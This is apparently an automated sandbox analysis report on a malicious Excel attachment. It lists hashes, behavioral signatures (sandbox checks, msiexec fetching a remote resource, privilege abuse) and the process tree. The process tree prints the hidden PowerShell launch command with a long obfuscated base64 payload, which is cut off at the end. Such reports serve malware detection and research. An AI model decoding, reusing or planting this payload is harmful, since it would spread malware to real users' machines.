Analysis
-
max time kernel
184s -
max time network
194s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
03-12-2022 21:23
Behavioral task
behavioral1
Sample
Nicht bestätigt 668781.xls
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
Nicht bestätigt 668781.xls
Resource
win10v2004-20220812-en
General
-
Target
Nicht bestätigt 668781.xls
-
Size
136KB
-
MD5
42b4e867c32dac838da681c1a3d8b709
-
SHA1
9e5dcce0f8c9c91ed0d4088d7c81baf103cbb2f3
-
SHA256
b08f0a2abfb1fdef1d37d602fbb2ce69b63c33a58655732ba5a6c3488f827e97
-
SHA512
669b72b81ea18f82c86c7bc39c96729958ba876db7d95f0af02ff0263d60b60e3162be94397bbcf87a86457d7ea5b4eef475ccb616b4aa8e623cb1e1ff21a1ec
-
SSDEEP
3072:/mk3hbdlylKsgqopeJBWhZFGkE+cL2NdAnMPitGv4UL24WE7pI2KLS2Ws1ttEhDd:Ok3hbdlylKsgqopeJBWhZFVE+W2NdAMa
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4020 1748 powershell.exe EXCEL.EXE -
Unknown use of msiexec with remote resource 1 IoCs
Processes:
msiexec.exepid process 2732 msiexec.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 1748 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 4020 powershell.exe 4020 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exemsiexec.exemsiexec.exedescription pid process Token: SeDebugPrivilege 4020 powershell.exe Token: SeShutdownPrivilege 2732 msiexec.exe Token: SeIncreaseQuotaPrivilege 2732 msiexec.exe Token: SeSecurityPrivilege 4176 msiexec.exe Token: SeCreateTokenPrivilege 2732 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2732 msiexec.exe Token: SeLockMemoryPrivilege 2732 msiexec.exe Token: SeIncreaseQuotaPrivilege 2732 msiexec.exe Token: SeMachineAccountPrivilege 2732 msiexec.exe Token: SeTcbPrivilege 2732 msiexec.exe Token: SeSecurityPrivilege 2732 msiexec.exe Token: SeTakeOwnershipPrivilege 2732 msiexec.exe Token: SeLoadDriverPrivilege 2732 msiexec.exe Token: SeSystemProfilePrivilege 2732 msiexec.exe Token: SeSystemtimePrivilege 2732 msiexec.exe Token: SeProfSingleProcessPrivilege 2732 msiexec.exe Token: SeIncBasePriorityPrivilege 2732 msiexec.exe Token: SeCreatePagefilePrivilege 2732 msiexec.exe Token: SeCreatePermanentPrivilege 2732 msiexec.exe Token: SeBackupPrivilege 2732 msiexec.exe Token: SeRestorePrivilege 2732 msiexec.exe Token: SeShutdownPrivilege 2732 msiexec.exe Token: SeDebugPrivilege 2732 msiexec.exe Token: SeAuditPrivilege 2732 msiexec.exe Token: SeSystemEnvironmentPrivilege 2732 msiexec.exe Token: SeChangeNotifyPrivilege 2732 msiexec.exe Token: SeRemoteShutdownPrivilege 2732 msiexec.exe Token: SeUndockPrivilege 2732 msiexec.exe Token: SeSyncAgentPrivilege 2732 msiexec.exe Token: SeEnableDelegationPrivilege 2732 msiexec.exe Token: SeManageVolumePrivilege 2732 msiexec.exe Token: SeImpersonatePrivilege 2732 msiexec.exe Token: SeCreateGlobalPrivilege 2732 msiexec.exe Token: SeShutdownPrivilege 2732 msiexec.exe Token: SeIncreaseQuotaPrivilege 2732 msiexec.exe Token: SeCreateTokenPrivilege 2732 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2732 msiexec.exe Token: SeLockMemoryPrivilege 2732 msiexec.exe Token: SeIncreaseQuotaPrivilege 2732 msiexec.exe Token: SeMachineAccountPrivilege 2732 msiexec.exe Token: SeTcbPrivilege 2732 msiexec.exe Token: SeSecurityPrivilege 2732 msiexec.exe Token: SeTakeOwnershipPrivilege 2732 msiexec.exe Token: SeLoadDriverPrivilege 2732 msiexec.exe Token: SeSystemProfilePrivilege 2732 msiexec.exe Token: SeSystemtimePrivilege 2732 msiexec.exe Token: SeProfSingleProcessPrivilege 2732 msiexec.exe Token: SeIncBasePriorityPrivilege 2732 msiexec.exe Token: SeCreatePagefilePrivilege 2732 msiexec.exe Token: SeCreatePermanentPrivilege 2732 msiexec.exe Token: SeBackupPrivilege 2732 msiexec.exe Token: SeRestorePrivilege 2732 msiexec.exe Token: SeShutdownPrivilege 2732 msiexec.exe Token: SeDebugPrivilege 2732 msiexec.exe Token: SeAuditPrivilege 2732 msiexec.exe Token: SeSystemEnvironmentPrivilege 2732 msiexec.exe Token: SeChangeNotifyPrivilege 2732 msiexec.exe Token: SeRemoteShutdownPrivilege 2732 msiexec.exe Token: SeUndockPrivilege 2732 msiexec.exe Token: SeSyncAgentPrivilege 2732 msiexec.exe Token: SeEnableDelegationPrivilege 2732 msiexec.exe Token: SeManageVolumePrivilege 2732 msiexec.exe Token: SeImpersonatePrivilege 2732 msiexec.exe Token: SeCreateGlobalPrivilege 2732 msiexec.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
EXCEL.EXEpid process 1748 EXCEL.EXE 1748 EXCEL.EXE 1748 EXCEL.EXE 1748 EXCEL.EXE 1748 EXCEL.EXE 1748 EXCEL.EXE 1748 EXCEL.EXE 1748 EXCEL.EXE 1748 EXCEL.EXE 1748 EXCEL.EXE 1748 EXCEL.EXE 1748 EXCEL.EXE -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
EXCEL.EXEpowershell.exedescription pid process target process PID 1748 wrote to memory of 4020 1748 EXCEL.EXE powershell.exe PID 1748 wrote to memory of 4020 1748 EXCEL.EXE powershell.exe PID 4020 wrote to memory of 1120 4020 powershell.exe HOSTNAME.EXE PID 4020 wrote to memory of 1120 4020 powershell.exe HOSTNAME.EXE PID 4020 wrote to memory of 2732 4020 powershell.exe msiexec.exe PID 4020 wrote to memory of 2732 4020 powershell.exe msiexec.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Nicht bestätigt 668781.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -windowstyle 1 -command "$best64code = \"==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